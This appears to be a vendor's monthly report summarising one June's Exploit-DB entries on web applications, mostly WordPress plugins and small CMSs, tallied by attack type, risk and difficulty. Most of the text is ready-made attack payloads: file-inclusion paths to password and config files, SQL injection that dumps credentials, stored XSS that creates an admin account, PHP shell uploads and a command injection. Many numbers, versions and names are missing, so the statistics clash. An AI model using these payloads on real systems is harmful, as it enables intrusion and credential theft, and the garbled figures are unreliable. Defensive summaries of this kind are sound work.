Analysis summary (prepared by: Penta Security Systems, Security Evaluation Team)

EDB Analysis Report (05.06) 05.06.0~05.06.0
Information published on Exploit-DB (http://exploit-db.com), classified by category.

Analysis of the Exploit-DB entries published in June 05 shows that LFI attacks accounted for the largest number of reports. LFI attacks are generally low in attack difficulty, but because a successful attack exposes key system files or makes file download possible, they are classified as high-risk. LFI and Directory Traversal attacks succeed because user input is passed to the system as-is, without any additional security measures. Since the same weakness can be leveraged for many other attack attempts, administrators should prevent, as far as possible, user input from being used by the system without validation. In this month's breakdown by major software, WordPress again had the largest number of reports, continuing last month's trend, and the attack types were varied. A comprehensive update of plugins appears necessary.

1. Report count by type
Type | Report count
LFI |
XSS | 0
SQL | 9
File Upload |
Command |
RFI |
Directory Traversal |
Total | 8
(Chart: report count by type)

2. Classification by risk level
Risk | Report count | Percentage
High | | 5.%
 | | 86.8%
Low | 0 | 0.0%
Total | 8 | 00%
(Chart: classification by risk level)

3. Breakdown by attack difficulty
Difficulty | Report count | Percentage
High | | 7.9%
 | | 5.%
Low | | 86.8%
Total | 8 | 00%
(Chart: breakdown by attack difficulty)

4. Breakdown by major software
Software | Report count
Vfront |
ZCMS |
Novius |
Pasworld |
TYPO |
BlackCat |
Vesta Control Panel |
Thycotic |
WedgeOS |
Total | 8
(Chart: breakdown by major software)

** Details for major software with 5 or more reports
EDB number | Type | Attack difficulty | Attack risk | Name | Software name
78 | SQL | low | | LeagueManager.9. Plugin - / SQL |
700 | LFI | low | | zm Ajax Login & Register Plugin.0.9 - admin-ajax.php LFI |
75 | File Upload | low | high | Nmedia Member Conversation Plugin.5.0 - doupload.php File Upload |
709 | LFI | low | | Really Simple Guest Post - simple-guest-post-submit.php LFI |
744 | LFI | low | | Plugin 'WP Mobile Edition' css.php LFI |
74 | Command Inject | low | | Wp-ImageZoom - div_img.php Command |
764 | XSS | low | | Encrypted Contact Form Plugin.0.4 - options-general.php XSS |
75 | LFI | low | | RobotCPA Plugin V5 - f.php SQL |
754 | LFI | low | | History Collection - download.php LFI |
775 | File Upload | low | high | Aviary Image Editor Add On For Gravity Forms.0 - upload.php File Upload |
774 | LFI | low | | SE HTML5 Album Audio Player..0 - download_audio.php LFI |
76 | XSS | low | | Huge-IT Slider.7.5 - admin.php XSS |
Detailed entries (columns: date | EDB number | category | attack difficulty / attack risk | name; each entry is followed by its key attack code and its target program / target environment)

05-06-0 | 78 | SQL | low | LeagueManager.9. Plugin - / SQL
  Key attack code: /?match=%0and%099=99
  Target: LeagueManager.9. Plugin

05-06-0 | 786 | XSS | low | VFront 0.99. - variabili.php XSS
  Key attack code: /vfront-0.99./vfront-0.99./admin/variabili.php?feed=0&gidfocus=0
    Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
    "/><script>alert(666)</script>
  Target: Vfront, VFront 0.99.

05-06-0 | 786 | XSS | low | VFront 0.99. - log.php XSS
  Key attack code: /vfront-0.99./vfront-0.99./admin/log.php?op="/><script>var xhr%dnew XMLHttpRequest();xhr.onreadystatechange%dfunction(){if(xhr.status%d%d00){if(xhr.readystate%d%d4){alert(xhr.responsetext);}}};xhr.open('post','utenze.db.php?insert_new',true);xhr.setrequestheader('contenttype','application/x-www-formurlencoded');xhr.send('nome%dhyprlinxe%6cognome%dapparitionsec%6email%dx@x.com%6passwd%dhacked%6passwd%dhacked');</script>&tabella=&uid=&data_dal=all&data_al=all
  Target: Vfront, VFront 0.99.

05-06-0 | 786 | XSS | low | VFront 0.99. - query_editor.php XSS
  Key attack code: /vfront-0.99./vfront-0.99./admin/query_editor.php?id=&id_table=&id_campo="/><script>alert(666)</script>
  Target: Vfront, VFront 0.99.

05-06-04 | 700 | LFI | low | zm Ajax Login & Register Plugin.0.9 - admin-ajax.php LFI
  Key attack code:
    POST /wp-admin/admin-ajax.php HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    action=load_template&template=../etc/passwd
  Target: zm Ajax Login & Register Plugin.0.9

05-06-05 | 75 | File Upload | low / high | Nmedia Member Conversation Plugin.5.0 - doupload.php File Upload
  Key attack code:
    POST /wordpress/wp-content/plugins/wordpress-memberprivate-conversation/doupload.php HTTP/.
    Connection: Close
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: ko-kr
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
    Content-Type: multipart/form-data; boundary=---------------------------7dd009908f
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="filedata"; filename="lo.php"
    Content-Type: application/octet-stream
    <? phpinfo();?>
    -----------------------------7dd009908f--
  Target: Nmedia Member Conversation Plugin.5.0

05-06-05 | 709 | LFI | low | Really Simple Guest Post - simple-guest-post-submit.php LFI
  Key attack code:
    POST /wp-content/plugins/really-simple-guest-post/simple-guest-post-submit.php HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    rootpath=/etc/passwd
  Target: Really Simple Guest Post

05-06-08 | 745 | SQL | low | Pasworld - detail.php SQL
  Key attack code: /detail.php?id=%0and%0=--
  Target: Pasworld, Pasworld All Versions

05-06-08 | 744 | LFI | low | Plugin 'WP Mobile Edition' css.php LFI
  Key attack code: /wp-content/themes/mtheme-Unus/css/css.php?files=../../../../wp-config.php
  Target: Plugin 'WP Mobile Edition'

05-06-08 | 74 | Command | low | Wp-ImageZoom - div_img.php Command
  Key attack code: /wp-content/plugins/wp-imagezoom/div_img.php?cmd=delall
  Target: Wp-ImageZoom..0

05-06-09 | 748 | SQL | low | Clone Script.0 - related.php SQL
  Key attack code: /milw0rm/related.php?program=lol' AND (SELECT * FROM (SELECT(SLEEP(5)))yYCj) AND 'mqub'='mqub
  Target: Clone Script.0

05-06-0 | 764 | XSS | low | Encrypted Contact Form Plugin.0.4 - options-general.php XSS
  Key attack code:
    POST /wp-admin/options-general.php?page=conformconf HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    iframe_url="></iframe><script>alert('xss!');</script>
  Target: Encrypted Contact Form Plugin.0.4
05-06-0 | 76 | LFI | low | .6 - // LFI
  Key attack code:
    POST /wp-admin/options-general.php?page=conformconf HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    Cookie: lang=../../../../../../../etc/passwd%00
  Target: .6

05-06-0 | 760 | Directory Traversal | high | 6.5. - /bonita/portal/ Directory Traversal
  Key attack code: /bonita/portal/themeresource?theme=portal/../../../../../../../../../../../../../../../../&location=windows/system.ini
  Target: 6.5.

05-06-0 | 759 | SQL | low | .0.5.4p6 - show_sys_state.php SQL
  Key attack code: /monitor/show_sys_state.php?state=server&server=-%0UNION%0SELECT%0,version%8%9%0--%0-
  Target: .0.5.4p6

05-06-0 | 75 | LFI | low | RobotCPA Plugin V5 - f.php SQL
  Key attack code: /wp-content/plugins/robotcpa/f.php?l=cghwoi8vzmlsdgvyljlc9cmnlps4vli4vli4vli4vdaty9uzmlnlnboca==
  Target: RobotCPA Plugin V5

05-06-0 | 754 | LFI | low | History Collection - download.php LFI
  Key attack code: /wordpress/wp-content/plugins/historycollection/download.php?var=../../../wp-config.php
  Target: History Collection <=..

05-06-0 | 760 | RFI | low | 6.5. - login.jsp RFI
  Key attack code: /bonita/login.jsp?_l=en&redirecturl=//immuniweb.com/
  Target: 6.5.

05-06- | 775 | File Upload | low / high | Aviary Image Editor Add On For Gravity Forms.0 - upload.php File Upload
  Key attack code:
    POST /wp-content/plugins/aviary-image-editor-add-on-forgravity-forms/includes/upload.php HTTP/.
    Connection: Close
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: ko-kr
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
    Content-Type: multipart/form-data; boundary=---------------------------7dd009908f
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="filedata"; filename="shell.php"
    Content-Type: application/octet-stream
    <? phpinfo();?>
    -----------------------------7dd009908f--
  Target: Aviary Image Editor Add On For Gravity Forms.0

05-06- | 774 | LFI | low | SE HTML5 Album Audio Player..0 - download_audio.php LFI
  Key attack code: /wp-content/plugins/se-html5-album-audioplayer/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
  Target: SE HTML5 Album Audio Player..0

05-06- | 77 | SQL | low | ZCMS. - /ZCMS_./ SQL
  Key attack code:
    POST /ZCMS_./ZCMS_./?dir=login HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    username=admin&pass=hell' OR ''='
  Target: ZCMS, ZCMS.

05-06- | 77 | XSS | low | ZCMS. - /ZCMS_./ XSS
  Key attack code: /ZCMS_./ZCMS_./?dir=editpost&p=&title="<script>alert()</script>&content=<script>alert()</script>&author=<script>alert()</script>satan&visibility=&type=&comm=0
  Target: ZCMS, ZCMS.

05-06- | 77 | XSS | low | ZCMS. - index.jsp XSS
  Key attack code: /ZCMS_./ZCMS_./index.jsp?dir=editpost&p=&author=<script>alert(666)</script>
  Target: ZCMS, ZCMS.

05-06- | 770 | XSS | low | CMS - /kilrizzy--CMS-f7464/kilrizzy--CMSf7464/index.php/system/settings XSS
  Key attack code:
    POST /kilrizzy--cms-f7464/kilrizzy--cmsf7464/index.php/system/settings HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    from_name=<script>alert(666)</script>
  Target: CMS f7464

05-06- | 770 | LFI | low | CMS - /kilrizzy--CMS-f7464/kilrizzy--CMSf7464/index.php/connector LFI
  Key attack code: /kilrizzy--cms-f7464/kilrizzy--cmsf7464/index.php/connector$url=../../../../../../xampp/phpinfo.php
  Target: CMS f7464

05-06-6 | 70 | SQL | high / high | TYPO Akronymmanager Extension 0.5.0 - index.php SQL
  Key attack code: /typoconf/ext/sb_akronymmanager/mod/index.php?id=79%7%0union%0select%0(select%0group_concat(username,%7:%7,password)%0FROM%0be_users),%0--%0
  Target: TYPO, TYPO Akronymmanager Extension 0.5.0

05-06-7 | 704 | LFI | low | BlackCat CMS.. - logs.php LFI
  Key attack code: /blackcat/modules/blackcat/widgets/logs.php?dl=../config.php
  Target: BlackCat, BlackCat CMS..
05-06-4 | 769 | Command | high | Vesta Control Panel 0.9.8 - index.php Command
  Key attack code: /list/backup/index.php?backup=%7%0 %0 echo '[base64 blob]' base64 --decode > /tmp/sess_45%0 %0echo%0\
  Target: Vesta Control Panel 0.9.8

05-06-4 | 764 | File Upload | low | SimpleImageUpload - index.php File Upload
  Key attack code:
    POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/.
    Connection: Close
    Accept: text/html, application/xhtml+xml, */*
    Accept-Language: ko-kr
    User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0)
    Content-Type: multipart/form-data; boundary=---------------------------7dd009908f
    -----------------------------7dd009908f
    Content-Disposition: form-data; name="filedata"; filename="l0v.php."
    Content-Type: application/octet-stream
    <? phpinfo();?>
    -----------------------------7dd009908f--
  Target: SimpleImageUpload.0

05-06-4 | 76 | SQL | high / high | 0.0. - register.php SQL
  Key attack code:
    POST /genixcms/register.php HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    email='and(select%0%0from%0(select%0count(*),concat(version(),floor(rand(0)*))x%0from%0information_schema.tables%0group%0by%0x)a)and'&pass=cfreer&pass=cfreer&register=&token=&userid=poc-lab
  Target: 0.0.

05-06-4 | 76 | XSS | low | Huge-IT Slider.7.5 - admin.php XSS
  Key attack code:
    POST /wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=&task=apply HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    titleimage4=%+onmouseover%dalert%8%fi0akiN_hack%F%9+a%D%&
  Target: Huge-IT Slider.7.5

05-06-4 | 760 | XSS | low | 0.0. - index.php XSS
  Key attack code: /-master/master/gxadmin/index.php?page=posts&q='<script>alert('XSS By Hyprlinx')</script>
  Target: 0.0.

05-06-6 | 794 | XSS | low | Thycotic Secret Server 8.8.000004 - /SecretServer/api.ashx/simplehome/ XSS
  Key attack code: /SecretServer/api.ashx/simplehome/GetSecretItemValue?secretitemid=<script>alert();</script>&auditaction=unmask
  Target: Thycotic, Thycotic Secret Server 8.8.000004

05-06-0 | 7446 | SQL | low | CMS.0_.9. - rating.php SQL
  Key attack code:
    POST //fiyocms/apps/app_article/controller/rating.php HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    do=getrate&id=8;select sleep(5) --
  Target: CMS.0_.9.
05-06-0 | 7446 | SQL | | CMS.0_.9. - /fiyocms/user/login SQL
  Key attack code:
    POST /fiyocms/user/login HTTP/.
    User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7
    user='%b(select(0)from(select(sleep(5)))v)%b'&pass=poc-lab&login=login
  Target: CMS.0_.9.

05-06-0 | 744 | LFI | low | WedgeOS <= 4.0.4 - /ssgmanager/ LFI
  Key attack code: /ssgmanager/ssgimages?name=../../../../../etc/shadow
  Target: WedgeOS, WedgeOS <= 4.0.4

05-06-0 | 749 | LFI | low | Novius 5.0. - /novius-os.5.0.-elche/novius-os/admin/ LFI
  Key attack code: /novius-os.5.0.-elche/novius-os/admin/?tab=../../../../xampp/phpinfo.php
  Target: Novius, Novius 5.0.

05-06-0 | 749 | RFI | low | Novius 5.0. - /novius-os.5.0.-elche/novius-os/admin/nos/ RFI
  Key attack code: /novius-os.5.0.-elche/novius-os/admin/nos/login?redirect=http://www.satansbronzeBABYSHOES.com
  Target: Novius, Novius 5.0.